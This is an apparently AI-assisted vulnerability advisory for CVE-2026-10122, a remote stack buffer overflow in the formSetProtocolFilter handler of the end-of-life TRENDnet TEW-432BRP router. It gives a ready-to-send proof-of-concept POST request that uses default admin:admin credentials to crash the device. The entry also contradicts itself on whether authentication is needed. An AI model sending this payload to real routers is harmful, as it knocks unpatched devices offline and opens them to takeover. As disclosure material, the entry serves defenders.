CVE-2026-10122
Description
A vulnerability has been found in TRENDnet TEW-432BRP 3.10B20. This affects the function formSetProtocolFilter of the file /goform/formSetProtocolFilter. Such manipulation of the argument protocol_name leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The vendor explains: "This product has been EOL for 15 years (since 2009). As the item has been EOL for such a long time, we are not able to replicate or fix any vulnerabilities." This vulnerability only affects products that are no longer supported by the maintainer.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
TRENDnet TEW-432BRP router has a stack-based buffer overflow in formSetProtocolFilter, allowing remote unauthenticated attackers to crash the device or potentially execute arbitrary code.
Vulnerability
A stack-based buffer overflow vulnerability exists in the TRENDnet TEW-432BRP router running firmware version 3.10B20. The flaw resides in the formSetProtocolFilter function within the /goform/formSetProtocolFilter endpoint. The function copies the protocol_name parameter directly into a stack-based buffer without performing any length checks, enabling an overflow when an overly long string is supplied. The product is end-of-life (EOL) since 2009 and is no longer supported by the vendor [1].
Exploitation
An attacker can exploit this vulnerability remotely without requiring any prior authentication. By sending a crafted HTTP POST request to the /goform/formSetProtocolFilter endpoint with an excessively long protocol_name parameter, the stack buffer is overflowed. The public exploit proof-of-concept (PoC) demonstrates a crash by sending a long string of 'a' characters; further refinement could allow overwriting the return address to achieve arbitrary code execution [1].
Impact
Successful exploitation leads to a stack buffer overflow, potentially causing denial of service (device crash) or, with a carefully crafted payload, arbitrary code execution with the privileges of the web server process (boa). This could allow an attacker to fully compromise the router, altering network traffic, exfiltrating data, or using the device as a pivot for further attacks [1].
Mitigation
No fix is available. The vendor has stated that the TEW-432BRP has been end-of-life for 15 years (since 2009) and will not be patched. Users are strongly advised to replace the device with a supported and current router model. The vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1].
AI Insight generated on May 30, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: =3.10B20
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input validation in formSetProtocolFilter allows an unbounded stack copy of the protocol_name parameter, causing a stack-based buffer overflow."
Attack vector
An unauthenticated remote attacker sends a crafted HTTP POST request to `/goform/formSetProtocolFilter` with an overly long `protocol_name` parameter. The request includes a Basic Authorization header (default credentials `admin:admin`). The long string overflows a stack buffer in the `formSetProtocolFilter` function, overwriting the return address and enabling arbitrary code execution. [ref_id=1]
Affected code
The vulnerability is in the `formSetProtocolFilter` function within the `/goform/formSetProtocolFilter` handler of the boa binary on the TRENDnet TEW-432BRP router (firmware version 3.10B20). The `protocol_name` argument is copied directly to a stack-based local variable without any length check, allowing an attacker to overwrite the return address. [ref_id=1]
What the fix does
No patch is available. The vendor states the product has been end-of-life since 2009 and will not be fixed. The researcher recommends that string content should be checked during input extraction to prevent the unbounded copy that leads to the stack overflow. [ref_id=1]
Preconditions
- networkThe attacker must be able to reach the router's web management interface over the network.
- authThe attacker must know or guess the router's IP address and have valid credentials (default admin:admin).
- configThe router must be running firmware version 3.10B20 of the TEW-432BRP.
- inputThe attacker sends a POST request with a protocol_name parameter exceeding the stack buffer size.
Reproduction
Send the following HTTP POST request to the router (replace 192.168.10.1 with the target IP):
``` POST /goform/formSetProtocolFilter HTTP/1.1 Host: 192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 932
edit_row=-1&filters=4&mode=0&enable=1&protocol_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&protocol=0&start_port=5000&end_port=10000&add=Add&webpage=fw_protocolfilter.asp ```
The router will crash and become unresponsive. [ref_id=1]
Generated on May 30, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
0No linked articles in our index yet.